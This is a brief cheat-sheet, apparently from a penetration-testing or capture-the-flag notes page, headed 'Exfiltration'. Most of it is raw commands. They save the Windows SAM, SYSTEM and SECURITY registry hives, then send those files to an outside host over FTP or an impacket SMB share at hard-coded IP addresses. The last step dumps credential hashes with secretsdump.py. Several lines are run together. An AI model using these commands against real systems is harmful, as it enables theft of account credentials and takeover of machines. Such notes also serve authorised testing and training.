Exfiltration
reg.exe save HKLM\SAM sam.bakreg.exe save HKLM\SYSTEM system.bakreg.exe save HKLM\SECURITY security.bakimpacket-smbserver share share/ -smb2support -username user -password password1echo open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\Users\Administrator\Desktop\sam.bak >> ftp.txt && echo put C:\Users\Administrator\Desktop\system.bak >> ftp.txt && echo bye >> ftp.txt
ftp -v -n -s:ftp.txtnet use \\10.50.102.164\share /USER:adot8\user password1
move sam.bak \\10.50.102.164\share\sam.bak
move system.bak \\10.50.102.164\share\system.baksecretsdump.py -sam sam.bak -system system.bak localLast updated